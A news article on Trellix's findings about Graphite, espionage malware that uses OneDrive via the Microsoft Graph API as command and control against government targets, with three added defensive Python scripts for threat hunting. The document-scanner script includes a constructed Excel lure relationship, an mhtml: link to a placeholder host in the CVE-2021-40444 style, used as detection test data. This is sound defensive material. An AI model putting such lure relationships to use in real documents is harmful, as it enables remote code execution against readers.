Trellix finds OneDrive malware targeting government officials in Western Asia

Researchers with Trellix named the malware "Graphite" because it uses Microsoft's Graph API to leverage OneDrive as a command and control server.
Written by Jonathan Greig, Contributor

Hackers are using Microsoft OneDrive in a multi-stage espionage campaign aimed at high-ranking government officials in Western Asia, according to a new report from Trellix. 

Researchers with Trellix named the malware involved "Graphite" because it uses Microsoft's Graph API to leverage OneDrive as a command and control server. The attack chain exploits CVE-2021-40444, a remote code execution vulnerability in the Windows MSHTML component, to run a malicious executable in memory, according to Trellix.

"As seen in the analysis of the Graphite malware, one quite innovative functionality is the use of the OneDrive service as a Command and Control through querying the Microsoft Graph API with a hardcoded token in the malware. This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic," Trellix explained. 

Christiaan Beek, lead scientist at Trellix Threat Labs, told ZDNet that he was surprised to see Microsoft OneDrive used as a Command and Control Server mechanism, noting that it was "a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders."

"Next, OneDrive would sync with the victim's machines and the encrypted commands would be executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker," Beek said, adding that what stood out most to him was "the multi-stage approach with a novel technique, multiple malware samples and the operational security of the actor."
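The mechanism Beek and the Trellix report describe, an implant that lists and writes OneDrive items through the Graph API with a token it carries, leaves two things a defender can hunt for: Graph drive calls from a process that has no business making them, and one bearer token reused from several hosts (a token issued to a sync client is tied to a user and device; a token compiled into a binary is the same everywhere). The Python below is an added example written for this page, not Trellix's tooling and not derived from the Graphite samples. It assumes endpoint or proxy telemetry that exposes the process name, request path and Authorization header (i.e. TLS inspection), and every host name, token, app ID and log line in it is constructed.

```python
"""Hunt for OneDrive-as-C2 traffic via the Microsoft Graph API (added example)."""
import base64
import hashlib
import json
import re
from collections import defaultdict

# Graph drive endpoints: the API surface an implant needs to list, read and
# write files in a OneDrive, for the signed-in user or a named user.
DRIVE_PATH = re.compile(r"^/v1\.0/(me|users/[^/]+)/drive(/|$)")
# Processes expected to reach those endpoints: an assumption, tune per estate.
ALLOWED_PROCESSES = {"onedrive.exe", "excel.exe", "winword.exe", "outlook.exe", "teams.exe"}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _fake_jwt(payload: dict) -> str:
    """Unsigned JWT-shaped token, used only to build the constructed sample."""
    header = _b64url(json.dumps({"typ": "JWT", "alg": "RS256"}).encode())
    return f"{header}.{_b64url(json.dumps(payload).encode())}.{_b64url(b'sig')}"


# Constructed tokens: a per-device sync-client token, and the single token a
# malware author baked into the binary. App and tenant IDs are placeholders.
SYNC_TOKEN = _fake_jwt({"aud": "https://graph.microsoft.com", "scp": "Files.ReadWrite",
                        "appid": "00000000-0000-0000-0000-00000000aaaa",
                        "tid": "00000000-0000-0000-0000-0000000000ee", "exp": 1636156800})
IMPLANT_TOKEN = _fake_jwt({"aud": "https://graph.microsoft.com", "scp": "Files.ReadWrite.All",
                           "appid": "00000000-0000-0000-0000-00000000bbbb",
                           "tid": "00000000-0000-0000-0000-0000000000ff", "exp": 1636156800})

# Constructed telemetry, one request per line: host|process|destination|method|path|authorization
SAMPLE_LOG = f"""\
WS01|OneDrive.exe|graph.microsoft.com|GET|/v1.0/me/drive/root/children|Bearer {SYNC_TOKEN}
WS01|rundll32.exe|graph.microsoft.com|GET|/v1.0/me/drive/root:/tasks:/children|Bearer {IMPLANT_TOKEN}
WS02|rundll32.exe|graph.microsoft.com|PUT|/v1.0/me/drive/root:/results/WS02.bin:/content|Bearer {IMPLANT_TOKEN}
WS03|chrome.exe|login.microsoftonline.com|POST|/common/oauth2/v2.0/token|-
WS03|powershell.exe|graph.microsoft.com|GET|/v1.0/me|-
"""


def decode_jwt_claims(token: str) -> dict:
    """Read claims without verifying the signature: fine for triage, never for authorisation."""
    parts = token.split(".")
    if len(parts) != 3:
        return {}
    body = parts[1] + "=" * (-len(parts[1]) % 4)  # restore base64url padding
    try:
        return json.loads(base64.urlsafe_b64decode(body))
    except ValueError:  # covers binascii.Error and JSONDecodeError
        return {}


def parse_log(text: str) -> list:
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, proc, dest, method, path, auth = line.split("|", 5)
        token = auth[len("Bearer "):] if auth.startswith("Bearer ") else None
        rows.append({"host": host, "process": proc, "dest": dest,
                     "method": method, "path": path, "token": token})
    return rows


def token_fingerprint(token: str) -> str:
    """Short hash so tokens can be correlated in reports without being copied around."""
    return hashlib.sha256(token.encode()).hexdigest()[:12]


def flag_drive_calls(rows: list, allowed=ALLOWED_PROCESSES) -> list:
    """Graph drive endpoint reached by a process outside the allowlist."""
    findings = []
    for r in rows:
        if r["dest"] != "graph.microsoft.com" or not DRIVE_PATH.match(r["path"]):
            continue
        if r["process"].lower() in allowed:
            continue
        claims = decode_jwt_claims(r["token"]) if r["token"] else {}
        findings.append({"host": r["host"], "process": r["process"], "method": r["method"],
                         "path": r["path"], "appid": claims.get("appid"), "tid": claims.get("tid"),
                         "token_fp": token_fingerprint(r["token"]) if r["token"] else None})
    return findings


def shared_tokens(rows: list) -> dict:
    """Same bearer token from several hosts: a token baked into a binary, not a per-device grant."""
    hosts = defaultdict(set)
    for r in rows:
        if r["token"]:
            hosts[token_fingerprint(r["token"])].add(r["host"])
    return {fp: sorted(h) for fp, h in hosts.items() if len(h) > 1}


if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    for f in flag_drive_calls(rows):
        print(f"[C2?] {f['host']} {f['process']} {f['method']} {f['path']} appid={f['appid']}")
    for fp, hosts in shared_tokens(rows).items():
        print(f"[token reuse] {fp} seen on {', '.join(hosts)}")
```

The app ID and tenant ID read out of the token are the pivot an incident responder wants: they identify the Azure AD application the actor registered (or abused) and let the token be revoked, which the malware cannot recover from if the token is hardcoded. Decoding is done without signature verification on purpose; the code only reads claims and never treats them as proof of anything.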

Beek noted that the attack was successful but would not share more information about the hackers' goals, saying the investigation is still ongoing. The attack was prepared in July 2021 and deployed between September and 5 November 2021, according to the Trellix report.

Trellix's Marc Elias said it targeted "government officials overseeing national security policy and individuals in the defense industry."

Elias wrote that the attack is split into multiple stages so that it stays as hidden as possible and said that while attribution was difficult, there was some evidence as to the potential culprit. 

"A number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don't believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate," Elias wrote. "That said, we are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were setup."

The first stage of the attack "likely" involves a spear-phishing email aiming to lure victims into opening an Excel file named "parliament_rew.xlsx."

Other techniques help the attacker get around some antivirus scanning engines and office document analysis tools, allowing the attack to continue undetected.
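Since the first stage is an Excel lure and the chain relies on CVE-2021-40444, a workbook is worth triaging before anyone opens it. Office files are ZIP archives, and the CVE-2021-40444 delivery pattern publicly documented by Microsoft used a relationship whose Target is an external mhtml: URL that pulls MSHTML content into the document; the same relationship files carry the remote-template and OLE links used by other document attacks. The scanner below is an added example for this page, not Trellix's tooling and not derived from the campaign's documents. The workbook it inspects is built in memory (a minimal, constructed xlsx shape, not a complete valid workbook), and the relationship types it treats as suspicious are an assumption to tune.

```python
"""List external relationships in an OOXML file and flag remote-content ones (added example)."""
import io
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that pull content into the document rather than just link out
# (assumption: extend as needed; hyperlinks are deliberately not in this set).
REMOTE_CONTENT_TYPES = {"oleObject", "frame", "attachedTemplate"}
REMOTE_SCHEMES = ("http:", "https:", "file:", "\\\\")


def external_relationships(data: bytes) -> list:
    """(rels part, relationship type, target) for every relationship marked External."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rtype, rel.get("Target", "")))
    return hits


def suspicious_targets(data: bytes) -> list:
    """External relationships that fetch remote content: mhtml: targets anywhere,
    or OLE/frame/template links to http, https, file or UNC paths."""
    out = []
    for part, rtype, target in external_relationships(data):
        t = target.lower()
        if t.startswith("mhtml:") or "!x-usc:" in t:
            out.append((part, rtype, target))
        elif rtype in REMOTE_CONTENT_TYPES and t.startswith(REMOTE_SCHEMES):
            out.append((part, rtype, target))
    return out


def build_workbook(sheet_rels: str) -> bytes:
    """Constructed, minimal xlsx-shaped zip; enough structure for the scanner, not for Excel."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("_rels/.rels",
                    f"<Relationships xmlns='{RELS_NS}'><Relationship Id='rId1' "
                    f"Type='{REL_TYPE_BASE}officeDocument' Target='xl/workbook.xml'/></Relationships>")
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels",
                    f"<Relationships xmlns='{RELS_NS}'>{sheet_rels}</Relationships>")
    return buf.getvalue()


# Constructed samples: a benign external hyperlink, and the same workbook with an
# OLE relationship pointing at an mhtml: URL (placeholder host, not a real IOC).
HYPERLINK_REL = (f"<Relationship Id='rId2' Type='{REL_TYPE_BASE}hyperlink' "
                 "Target='https://example.invalid/budget' TargetMode='External'/>")
OLE_MHTML_REL = (f"<Relationship Id='rId3' Type='{REL_TYPE_BASE}oleObject' "
                 "Target='mhtml:http://example.invalid/side.html!x-usc:http://example.invalid/side.html' "
                 "TargetMode='External'/>")
CLEAN_XLSX = build_workbook(HYPERLINK_REL)
LURE_XLSX = build_workbook(HYPERLINK_REL + OLE_MHTML_REL)


if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_XLSX), ("lure", LURE_XLSX)):
        print(label, "external:", len(external_relationships(blob)))
        for part, rtype, target in suspicious_targets(blob):
            print(f"  [!] {part}: {rtype} -> {target}")
```

Run the same function over a real .xlsx or .docx by reading the file's bytes; anything it prints is a document that will reach out to the network when opened, which is the behaviour to block or sandbox regardless of which vulnerability the remote content goes on to exploit.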

"It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference due to the similarities of the functionality and the file structure used in the OneDrive account of the actors," the study explained. 

"One of the lure documents we mentioned before (named 'parliament_rew.xlsx') might have been aimed at targeting government employees. Besides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name 'Missions Budget.xlsx' contained the text 'Military and civilian missions and operations' and the budgets in dollars for the military operations in some countries for the years 2022 and 2023."

From its telemetry, Trellix found that Poland and other Eastern European countries were of interest to the hackers, and the report notes that the lure documents "show its activities are centered in specific regions and industries."

The report notes that the attacks occurred during the border tensions between Armenia and Azerbaijan. The hackers behind the project only worked from Monday to Friday, according to Trellix, and the timestamps show they worked only during normal business hours in the GMT+3 time zone, which covers Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time.
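The working-hours observation is a standard attribution signal, and the analysis is easy to reproduce: take activity timestamps in UTC (compile times, file-creation times in the actor's OneDrive, C2 check-ins), shift them into each candidate zone and count how many land in Monday-to-Friday office hours. The Python below is an added example, not from the Trellix report; its timestamps are constructed so that UTC+3 comes out as the best fit, and it reports ties, since a close second offset means the signal is weak and the hours say nothing about which of the GMT+3 countries the actor sits in.

```python
"""Fit attacker activity timestamps to a working-hours pattern per UTC offset (added example)."""
from datetime import datetime, timedelta

# Constructed UTC activity timestamps (ISO 8601), not real campaign artefacts.
SAMPLE_EVENTS = [
    "2021-09-06T05:10:00",  # Monday
    "2021-09-06T06:40:00",
    "2021-09-07T07:30:00",  # Tuesday
    "2021-09-07T09:00:00",
    "2021-09-08T10:15:00",  # Wednesday
    "2021-09-08T12:45:00",
    "2021-09-09T13:30:00",  # Thursday
    "2021-09-09T14:40:00",
    "2021-09-10T05:50:00",  # Friday
    "2021-09-10T14:55:00",
    "2021-09-10T21:30:00",  # Friday night UTC: already Saturday at UTC+3
    "2021-09-11T10:00:00",  # Saturday
]

BUSINESS_START, BUSINESS_END = 8, 18  # local office hours, [start, end)


def in_business_hours(local: datetime) -> bool:
    """Monday to Friday, between BUSINESS_START and BUSINESS_END local time."""
    return local.weekday() < 5 and BUSINESS_START <= local.hour < BUSINESS_END


def score_offsets(utc_iso_events, offsets=range(-12, 15)) -> dict:
    """For each whole-hour UTC offset, count the events inside business hours in that zone."""
    events = [datetime.fromisoformat(s) for s in utc_iso_events]
    return {off: sum(in_business_hours(ev + timedelta(hours=off)) for ev in events)
            for off in offsets}


def best_offsets(utc_iso_events) -> tuple:
    """(top score, offsets reaching it). Several offsets tied means the signal is weak."""
    scores = score_offsets(utc_iso_events)
    top = max(scores.values())
    return top, sorted(off for off, s in scores.items() if s == top)


def weekday_hour_histogram(utc_iso_events, offset_hours: int) -> dict:
    """(weekday 0=Mon, hour) -> count in the candidate zone, to eyeball the pattern."""
    hist = {}
    for s in utc_iso_events:
        local = datetime.fromisoformat(s) + timedelta(hours=offset_hours)
        key = (local.weekday(), local.hour)
        hist[key] = hist.get(key, 0) + 1
    return hist


if __name__ == "__main__":
    top, offsets = best_offsets(SAMPLE_EVENTS)
    tie = f" (tie: {', '.join(f'{o:+d}' for o in offsets)})" if len(offsets) > 1 else ""
    print(f"{top}/{len(SAMPLE_EVENTS)} events fall in office hours at UTC{offsets[0]:+d}{tie}")
    for (day, hour), n in sorted(weekday_hour_histogram(SAMPLE_EVENTS, offsets[0]).items()):
        print(f"  weekday {day} {hour:02d}:00  {'#' * n}")
```

Real data needs two caveats the sample does not exercise: compile timestamps can be forged or zeroed, so corroborate them with timestamps the actor does not control (server-side file creation, proxy logs), and a handful of events is not enough to separate adjacent offsets.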

"Another interesting discovery during the investigation was that the attackers were using the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matched with an ESET report in which researchers mentioned a Russian Operation targeting Eastern European countries. Analyzing and comparing code-blocks and sequences from the graphite malware with our database of samples, we discovered overlap with samples in 2018 being attributed to APT28," Trellix explained. 

"Although we mentioned some tactics, techniques and procedures (TTPs) of the actors behind this campaign, we simply do not have enough context, similarities or overlap to point us with low/moderate confidence towards APT28, let alone a nation-state sponsor. However, we believe we are dealing with a skilled actor based on how the infrastructure, malware coding and operation was setup."
